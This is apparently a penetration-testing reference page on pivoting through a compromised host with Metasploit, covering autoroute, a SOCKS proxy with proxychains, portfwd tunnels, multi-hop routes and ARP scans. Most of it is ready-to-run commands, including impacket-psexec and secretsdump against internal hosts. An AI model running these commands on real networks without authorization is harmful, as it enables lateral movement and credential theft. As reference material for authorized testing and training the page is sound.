Skip to main content

Pivoting


Overview​

Pivoting routes traffic through a compromised host to reach network segments not directly accessible from Kali. Metasploit supports three mechanisms:

MethodWhat It DoesBest For
route / autorouteTells MSF to send traffic through a sessionRunning MSF modules against internal hosts
portfwdForwards a single port through a Meterpreter sessionAccessing a specific service (RDP, SMB, web)
SOCKS proxyExposes a SOCKS5 proxy on Kali backed by a sessionRouting arbitrary tools (Impacket, xfreerdp, nmap) through the pivot

Use autoroute + SOCKS proxy together as the standard pivot setup - it gives both MSF modules and external tools access to the internal network.


autoroute​

autoroute adds a routing entry in MSF that directs traffic for a given subnet through a specified session.

# From msfconsole (session already backgrounded)
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION <ID>
msf6 > set SUBNET <TARGET_INTERNAL_SUBNET> # e.g., 10.10.10.0/24
msf6 > run

# Or run directly from inside Meterpreter
meterpreter > run post/multi/manage/autoroute SUBNET=10.10.10.0/24

# Auto-detect subnets from the pivot host's routing table
meterpreter > run post/multi/manage/autoroute CMD=autoadd

Verify routes:

msf6 > route print

Remove a route:

msf6 > route remove 10.10.10.0/24 <SESSION_ID>

SOCKS Proxy​

Once routes are in place, a SOCKS proxy server lets external tools (Impacket, xfreerdp, proxychains, etc.) route through the MSF session to reach internal hosts.

msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > set SRVHOST 127.0.0.1
msf6 > run -j

Verify it's running:

msf6 > jobs

Configure proxychains​

Edit /etc/proxychains4.conf:

# Comment out any existing socks lines at the bottom, then add:
socks5 127.0.0.1 1080

Use proxychains with external tools​

# Nmap through pivot (TCP only - -sT required, no SYN scan through proxy)
proxychains nmap -sT -Pn -n -p 22,80,443,445,3389 10.10.10.50

# Impacket through pivot
proxychains impacket-psexec domain/Administrator:Password@10.10.10.50
proxychains impacket-secretsdump domain/Administrator:Password@10.10.10.50

# RDP through pivot
proxychains xfreerdp /v:10.10.10.50 /u:Administrator /d:DOMAIN /cert-ignore
proxychains Nmap Limitation

proxychains only supports TCP. -sS (SYN) and -sU (UDP) scans will fail or produce inaccurate results. Always use -sT -Pn when scanning through a SOCKS proxy.


portfwd​

portfwd is a quick single-service tunnel through an existing Meterpreter session. Useful when you don't need a full SOCKS proxy - just access to one specific port.

meterpreter > portfwd add -l <LOCAL_PORT> -p <REMOTE_PORT> -r <REMOTE_HOST>

Common portfwd Use Cases​

# Access RDP on an internal host
meterpreter > portfwd add -l 13389 -p 3389 -r 10.10.10.50
xfreerdp /v:localhost:13389 /u:Administrator /cert-ignore

# Access SMB on an internal host
meterpreter > portfwd add -l 1445 -p 445 -r 10.10.10.50
impacket-psexec domain/Administrator:Password@127.0.0.1 -port 1445

# Access a web application on internal host
meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.100
# Browse: http://localhost:8080

# Access SSH on internal host
meterpreter > portfwd add -l 2222 -p 22 -r 10.10.10.50
ssh -p 2222 user@localhost

Manage forwards:

meterpreter > portfwd list
meterpreter > portfwd delete -l 13389
meterpreter > portfwd flush # Remove all forwards

Standard Pivot Setup Workflow​

# 1. Get a session on the pivot host, background it
meterpreter > background

# 2. Add routes for the internal subnet
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION 1
msf6 > set SUBNET 10.10.10.0/24
msf6 > run

# 3. Start SOCKS proxy
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > set SRVHOST 127.0.0.1
msf6 > run -j

# 4. Run MSF modules against internal targets (routes handle this automatically)
msf6 > use auxiliary/scanner/smb/smb_version
msf6 > set RHOSTS 10.10.10.0/24
msf6 > run

# 5. Use proxychains for non-MSF tools
proxychains impacket-psexec domain/Administrator:Password@10.10.10.50

Multi-Hop Pivoting​

If a second compromised host can reach a third subnet, add another route through the second session:

# Session 1 = first pivot (10.10.10.x)
# Session 2 = second pivot (10.20.20.x, reached through session 1)

msf6 > use post/multi/manage/autoroute
msf6 > set SESSION 2
msf6 > set SUBNET 10.20.20.0/24
msf6 > run

# SOCKS proxy already running on 1080 handles routing automatically
# proxychains tools can now reach 10.20.20.x through sessions 1 β†’ 2

ARP Scanning Through a Session​

Before running full scans, identify live hosts in the internal subnet using the pivot host's ARP table and a simple scan - less noisy than an Nmap sweep.

meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24

Or from a routed session:

msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 > set RHOSTS 10.10.10.0/24
msf6 > set SRHOSTS 10.10.10.1 # Source IP (pivot host address in that subnet)
msf6 > run